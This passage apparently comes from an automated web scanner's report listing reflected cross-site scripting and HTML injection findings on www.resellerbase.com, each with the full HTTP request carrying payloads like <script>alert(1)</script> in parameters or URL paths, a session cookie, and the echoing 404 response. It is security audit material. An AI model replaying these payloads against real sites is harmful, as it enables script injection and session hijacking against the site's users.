The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 5bf11<a>a96efe382e2 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/themes/kosmos/search.php?keyword=search...&Submit3=Search5bf11<a>a96efe382e2&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/search.php?keyword=search...&Submit3=Search5bf11<a>a96efe382e2&opt=2 was not found on this server.</p>
...[SNIP]...

2.2245. http://www.resellerbase.com/detail/31/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload aae22<a>26404f8c3d6 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/themes/kosmos/search.php?keyword=search...aae22<a>26404f8c3d6&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/search.php?keyword=search...aae22<a>26404f8c3d6&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2246. http://www.resellerbase.com/detail/31/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ad62f<script>alert(1)</script>30bc5928170 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&ad62f<script>alert(1)</script>30bc5928170=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&ad62f<script>alert(1)</script>30bc5928170=1 was not found on this server.</p>
...[SNIP]...

2.2247. http://www.resellerbase.com/detail/31/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload eb8b8<a>0b265b39d84 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2eb8b8<a>0b265b39d84 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2eb8b8<a>0b265b39d84 was not found on this server.</p>
...[SNIP]...

2.2248. http://www.resellerbase.com/detail/31/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e9142<script>alert(1)</script>eca1785987d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile9142<script>alert(1)</script>eca1785987d/31/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile9142<script>alert(1)</script>eca1785987d/31/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2249. http://www.resellerbase.com/detail/31/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e53f5<script>alert(1)</script>45531d9a651 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31e53f5<script>alert(1)</script>45531d9a651/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31e53f5<script>alert(1)</script>45531d9a651/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2250. http://www.resellerbase.com/detail/31/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 47468<script>alert(1)</script>3e306a374e5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes47468<script>alert(1)</script>3e306a374e5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes47468<script>alert(1)</script>3e306a374e5/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2251. http://www.resellerbase.com/detail/31/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8f7b4<script>alert(1)</script>a0c5623d906 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/search.php8f7b4<script>alert(1)</script>a0c5623d906?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/search.php8f7b4<script>alert(1)</script>a0c5623d906?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2252. http://www.resellerbase.com/detail/31/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 95731<a>2d17b890a5b was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/themes/search.php?keyword=search...&Submit3=Search95731<a>2d17b890a5b&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/search.php?keyword=search...&Submit3=Search95731<a>2d17b890a5b&opt=2 was not found on this server.</p>
...[SNIP]...

2.2253. http://www.resellerbase.com/detail/31/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload a31ec<a>cf963660554 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/themes/search.php?keyword=search...a31ec<a>cf963660554&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/search.php?keyword=search...a31ec<a>cf963660554&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2254. http://www.resellerbase.com/detail/31/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6ac97<script>alert(1)</script>e012a1e425d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/search.php?keyword=search...&Submit3=Search&opt=2&6ac97<script>alert(1)</script>e012a1e425d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/search.php?keyword=search...&Submit3=Search&opt=2&6ac97<script>alert(1)</script>e012a1e425d=1 was not found on this server.</p>
...[SNIP]...

2.2255. http://www.resellerbase.com/detail/31/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 8d5bb<a>824ea9da18d was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/themes/search.php?keyword=search...&Submit3=Search&opt=28d5bb<a>824ea9da18d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/search.php?keyword=search...&Submit3=Search&opt=28d5bb<a>824ea9da18d was not found on this server.</p>
...[SNIP]...

2.2256. http://www.resellerbase.com/detail/32/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1fe02<script>alert(1)</script>509b7f2b62f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1fe02<script>alert(1)</script>509b7f2b62f/32/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1fe02<script>alert(1)</script>509b7f2b62f/32/ was not found on this server.</p>
...[SNIP]...

2.2257. http://www.resellerbase.com/detail/32/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bf77e<script>alert(1)</script>8de1a2f3665 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32bf77e<script>alert(1)</script>8de1a2f3665/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32bf77e<script>alert(1)</script>8de1a2f3665/ was not found on this server.</p>
...[SNIP]...

2.2258. http://www.resellerbase.com/detail/32/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 18141<script>alert(1)</script>e9d0b64ffa2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32/?18141<script>alert(1)</script>e9d0b64ffa2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/?18141<script>alert(1)</script>e9d0b64ffa2=1 was not found on this server.</p>
...[SNIP]...

2.2259. http://www.resellerbase.com/detail/32/6-chats-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/6-chats-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6fc2d<script>alert(1)</script>11a0c195b93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail6fc2d<script>alert(1)</script>11a0c195b93/32/6-chats-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail6fc2d<script>alert(1)</script>11a0c195b93/32/6-chats-com.html was not found on this server.</p>
...[SNIP]...

2.2260. http://www.resellerbase.com/detail/32/6-chats-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/32/6-chats-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 10760<a>601b90ee5ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/3210760<a>601b90ee5ea/6-chats-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3210760<a>601b90ee5ea/6-chats-com.html was not found on this server.</p>
...[SNIP]...

2.2261. http://www.resellerbase.com/detail/32/6-chats-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/6-chats-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b25a3<script>alert(1)</script>b2ff034afce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32/b25a3<script>alert(1)</script>b2ff034afce HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/b25a3<script>alert(1)</script>b2ff034afce was not found on this server.</p>
...[SNIP]...

2.2262. http://www.resellerbase.com/detail/32/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8c968<script>alert(1)</script>5c26522f008672cf0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail8c968<script>alert(1)</script>5c26522f008672cf0/32/rating.php?id=32&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/6-chats-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

